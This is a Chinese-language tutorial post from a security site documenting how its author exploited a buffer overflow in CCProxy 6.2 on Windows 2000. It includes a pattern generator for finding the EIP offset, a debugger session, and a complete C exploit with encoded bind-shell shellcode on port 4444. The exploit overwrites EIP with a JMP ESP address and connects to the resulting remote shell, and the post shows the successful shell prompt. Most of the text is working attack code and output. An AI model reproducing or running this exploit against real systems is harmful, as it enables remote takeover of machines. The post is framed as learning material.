xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加文章 Xcon English Version

CCProxy 6.2溢出学习笔记


创建时间:2006-10-18
文章属性:原创
文章提交:cooldiyer (czgcool_at_163.com)

写给像我一样的菜鸟,呵呵,不知道有没有说错话,回贴时别伤偶自尊,上次差点跳楼.........
很久前就有想学下溢出的念头,最近工作不是很忙,看了最新出的CCProxy 6.2溢出,小试一下
PS:其实漏洞出来很长时间了 -:(
Tools: VC++ 6.0、NTSD.exe (NT以上系统统自带)
Platform : Microsoft Windows 2000 [Version 5.00.2195]
先贴一个我以前写的测试溢出点的程序(改某牛人的)

    #include <stdio.h>
    int main(int argc,char **argv)
    {
        char *buff;
        int i,Len;
    
        if(argc < 3)
        {
            printf("Magic Char By CoolDiyer\n");
            printf("Usage:\n\t mc -c <count> [-v]\n");
            return -1;
        }
        
        Len=atoi(argv[2]);
        buff=(char *)malloc(Len+1);
        buff[Len]=0;
        
        for(i=0;i<Len;i++)
        {
            switch(i%4)
            {
                case 0: buff[i] = 'A'+i/(26*26*26)%26; break;
                case 1: buff[i] = 'A'+i/(26*26)%26; break;
                case 2: buff[i] = 'A'+i/26%26; break;
                case 3: buff[i] = 'A'+i%26; break;
            }
        }
        
        if(argc == 4)
        {
            for(i=1; i< Len+1; i++)
            {
                printf("%c",buff[i-1]);
                if(i%4 == 0)
                {
                    printf("\t%d\t0x%.2x",i,i);
                    printf("\tEIP ==> 0x%.2x%.2x%.2x%.2x\n",buff[i-1],buff[i-2],buff[i-3],buff[i-4]);
                }
            }
        } else {
            printf("%s\n",buff);
        }
        return 0;
    }

程序编译后如下
    Magic Char By CoolDiyer
    Usage:
         mc -c <count> [-v]
主要功能是生成字符串,如mc -c 200 生成一个200字节长的字符串

AAADAAAHAAALAAAPAAATAAAXAABBAABFAABJAABNAABRAABVAABZAACDAACHAACLAACPAACTAACXAADBAADFAADJAADNAADRAADV

执行mc -c 100 -v

AAAD    4    0x04    EIP ==> 0x44414141 (溢出时EIP的值)
AAAH    8    0x08    EIP ==> 0x48414141
AAAL    12    0x0c    EIP ==> 0x4c414141
AAAP    16    0x10    EIP ==> 0x50414141
AAAT    20    0x14    EIP ==> 0x54414141
AAAX    24    0x18    EIP ==> 0x58414141
AABB    28    0x1c    EIP ==> 0x42424141
AABF    32    0x20    EIP ==> 0x46424141
AABJ    36    0x24    EIP ==> 0x4a424141
AABN    40    0x28    EIP ==> 0x4e424141
AABR    44    0x2c    EIP ==> 0x52424141
AABV    48    0x30    EIP ==> 0x56424141
AABZ    52    0x34    EIP ==> 0x5a424141
AACD    56    0x38    EIP ==> 0x44434141
AACH    60    0x3c    EIP ==> 0x48434141
AACL    64    0x40    EIP ==> 0x4c434141
AACP    68    0x44    EIP ==> 0x50434141
AACT    72    0x48    EIP ==> 0x54434141
AACX    76    0x4c    EIP ==> 0x58434141
AADB    80    0x50    EIP ==> 0x42444141
AADF    84    0x54    EIP ==> 0x46444141
AADJ    88    0x58    EIP ==> 0x4a444141
AADN    92    0x5c    EIP ==> 0x4e444141
AADR    96    0x60    EIP ==> 0x52444141
AADV    100    0x64    EIP ==> 0x56444141

看到这里也许一些人就明白了,原理是借助于英文26个字母实现了26进制,4位最多可以到ZZZZ也就是26的4次方就是十进制的456976
十六进制的0x6f910,原理是因为编译器字节对齐默认情况下是按双字(4bytes)对齐的。看下实例就知道。
_____________________________________________________________________________________________________________________

安装CCProxy 6.2,运行后,查看进程ID为1306,执行“ntsd -p 1306”,输入“g”,开始调试程序,
用mc.exe生成一个3000字节的字符串,呵呵,反正够用了,如下

mc -c 3000 >a.txt

然后打开a.txt,开头加上“ping ”,注意ping后有个空格,然后先Ctrl+A,再Ctrl+C

telnet localhost 23

看到欢迎界面后直接点右键就可以粘贴,看ntsd里发生的情况.如下

0:021> g
NTSD: access violation
eax=ffffffff ebx=000002c8 ecx=00002736 edx=00000001 esi=019f82fd edi=019f86fd
eip=424e4241 esp=019f6700 ebp=012d04f0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
424e4241 ??               ???

输入“d esp”

0:002> d esp
019f6700  41 41 41 48 41 41 41 4c-41 41 41 50 41 41 41 54  AAAHAAALAAAPAAAT
019f6710  41 41 41 58 41 41 42 42-41 41 42 46 41 41 42 4a  AAAXAABBAABFAABJ
019f6720  41 41 42 4e 41 41 42 52-41 41 42 56 41 41 42 5a  AABNAABRAABVAABZ
019f6730  41 41 43 44 41 41 43 48-41 41 43 4c 41 41 43 50  AACDAACHAACLAACP
019f6740  41 41 43 54 41 41 43 58-41 41 44 42 41 41 44 46  AACTAACXAADBAADF
019f6750  41 41 44 4a 41 41 44 4e-41 41 44 52 41 41 44 56  AADJAADNAADRAADV
019f6760  41 41 44 5a 41 41 45 44-41 41 45 48 41 41 45 4c  AADZAAEDAAEHAAEL
019f6770  41 41 45 50 41 41 45 54-41 41 45 58 41 41 46 42  AAEPAAETAAEXAAFB
0:002>

可以看到EIP为0x424e4241,而且ESP刚好指向提交的字符串,shellcode就呼之于出了,

查看溢出时覆盖EIP的字符串的位置,命令如下

mc -c 3000 -v | find "0x424e4241"
命令返回
ABNB    1016    0x3f8   EIP ==> 0x424e4241
是字符串的1016-4的这个位置,找到了
查看ESP指向的位置
mc -c 3000 -v | find "AAAH"
命令返回
AAAH    8       0x08    EIP ==> 0x48414141
是字符串的第四个字节开始的四人字符
OK,现在开始写溢出程序(呵呵,只调试一次就OK,爽吧)实现过程很简单,就是覆盖EIP为windows下一个通用的JMP ESP的位置"\x12\x45\xfa\x7f"

以下代码改写自《网络渗透技术》
_____________________________________________________________________________________________________________________

/* exploit.c
*
*  CCProxy 溢出演示程序
*  作者:cooldiyer
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")

// jmp esp address of chinese version
#define JUMPESP "\x12\x45\xfa\x7f"

// Bind Port 4444
char shellcode[] =
"\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x23\x01\x80\x34\x0b\xf8\xe2\xfa"
"\xeb\x05\xe8\xeb\xff\xff\xff\x11\x01\xf8\xf8\xf8\xa7\x9c\x59\xc8"
"\xf8\xf8\xf8\x73\xb8\xf4\x73\x88\xe4\x55\x73\x90\xf0\x73\x0f\x92"
"\xfb\xa1\x10\x61\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f"
"\x8b\xca\xa7\xac\x07\xee\x73\x10\x92\xfd\xa1\x10\x78\xf8\xf8\xf8"
"\x1a\x01\x79\x14\x68\xf9\xf8\xf8\xac\x90\xf9\xf9\xf8\xf8\x07\xae"
"\xf4\xa8\xa8\xa8\xa8\x92\xf9\x92\xfa\x07\xae\xe8\x73\x20\xcb\x38"
"\xa8\xa8\x90\xfa\xf8\xe9\xa4\x73\x34\x92\xe8\xa9\xab\x07\xae\xec"
"\x92\xf9\xab\x07\xae\xe0\xa8\xa8\xab\x07\xae\xe4\x73\x20\x90\x9b"
"\x95\x9c\xf8\x75\xec\xdc\x7b\x14\xac\x73\x04\x92\xec\xa1\xcb\x38"
"\x71\xfc\x77\x1a\x03\x3e\xbf\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71"
"\xa7\xb0\x71\xa7\xb4\x71\xa7\xa8\x75\xbf\xe8\xaf\xa8\xa9\xa9\xa9"
"\x92\xf9\xa9\xa9\xaa\xa9\x07\xae\xfc\xcb\x38\xb0\xa8\x07\xae\xf0"
"\xa9\xae\x73\x8d\xc4\x73\x8c\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb"
"\x0d\xcb\x31\xb1\xb9\x55\xfb\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c"
"\xf0\x39\x33\xff\xfb\x22\xb8\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6"
"\xdc\xfb\x25\x9e\x73\xf4\xb3\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb"
"\x3d\x53\xa6\xa1\x3b\x10\xfa\x07\x07\x07\xca\x8c\x69\xf4\x31\x44"
"\x5e\x93\x77\x0a\xe0\x99\xc5\x92\x4c\x78\xd5\xca\x80\x26\x9c\xe8"
"\x5f\x25\xf4\x67\x2b\xb3\x49\xe6\x6f\xf9";

// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
    struct sockaddr_in target;
    SOCKET s;
    int i;
    DWORD bf;
    fd_set wd;
    struct timeval tv;

    s = socket(AF_INET,SOCK_STREAM,0);
    if(s<0)
        return -1;

    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(address);
    if(target.sin_addr.s_addr==0)
    {
        closesocket(s);
        return -2;
    }
    target.sin_port = htons(port);
    bf = 1;
    ioctlsocket(s,FIONBIO,&bf);
    tv.tv_sec = timeout;
    tv.tv_usec = 0;
    FD_ZERO(&wd);
    FD_SET(s,&wd);
    connect(s,(struct sockaddr *)&target,sizeof(target));
    if((i=select(s+1,0,&wd,0,&tv))==(-1))
    {
        closesocket(s);
        return -3;
    }
    if(i==0)
    {
        closesocket(s);
        return -4;
    }
    i = sizeof(int);
    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
    if((bf!=0)||(i!=sizeof(int)))
    {
        closesocket(s);
        return -5;
    }
    ioctlsocket(s,FIONBIO,&bf);
    return s;
}

/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
    int     l;
    char    buf[512];
    struct    timeval time;
    unsigned long    ul[2];

    time.tv_sec = 1;
    time.tv_usec = 0;

    while (1)
    {
        ul[0] = 1;
        ul[1] = sock;

        l = select (0, (fd_set *)&ul, NULL, NULL, &time);
        if(l==1)
        {
            l = recv (sock, buf, sizeof (buf), 0);
            if (l <= 0)
            {
                printf ("[-] Connection closed.\n");
                return;
            }
            l = write (1, buf, l);
            if (l <= 0)
            {
                printf ("[-] Connection closed.\n");
                return;
            }
        }
        else
        {
            l = read (0, buf, sizeof (buf));
            if (l <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
            l = send(sock, buf, l, 0);
            if (l <= 0)
            {
                printf("[-] Connection closed.\n");
                return;
            }
        }
    }
}

int main(int argc, char *argv[])
{
    SOCKET  c,s;
    WSADATA WSAData;    
    char Buff[3008],Recv[1024];
    int i,nRet;
    if (argc < 3)
    {
        fprintf(stderr, "Usage: %s remote_addr remote_port", argv[0]);
        exit(1);
    }

    if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
    {
        printf("[-] WSAStartup failed.\n");
        WSACleanup();
        exit(1);
    }
    
    memset(Buff, 0x90, sizeof(Buff)-1); // NOP 填充
    memcpy(&Buff[0],"ping ",5);
    memcpy(&Buff[3005],"\r\n\0",3); // sizeof("ping ")+3000=3005
    memcpy(&Buff[1017], JUMPESP,4); // sizeof("ping ")+1012=1017
    memcpy(&Buff[9], shellcode,sizeof(shellcode)-1); // sizeof("ping ")+4=9
    
    printf("[+] Connect %s Port %s\n",argv[1],argv[2]);
    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    if(s<0)
    {
        printf("[-] connect err.\n");
        exit(1);
    }
    
    memset(Recv,0,sizeof(Recv));
    recv(s,Recv,sizeof(Recv),0);
    nRet=send(s,Buff,sizeof(Buff),0);
    printf("[+] Send %d Bytes OK........\n[+] Wait For Connect To Shell\n",nRet);
    Sleep(1000);

    c = Make_Connection(argv[1], 4444, 10);
    shell(c);

    WSACleanup();
    return 1;
}

_____________________________________________________________________________________________________________________

好了,执行 exploit 127.0.0.1 23 返回结果如下

[+] Connect 127.0.0.1 Port 23
[+] Send 3008 Bytes OK........
[+] Wait For Connect To Shell
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\>

成功得到一个shell,个人精力有限,其它OS没有测试,只学一个原理,谢谢。。。。。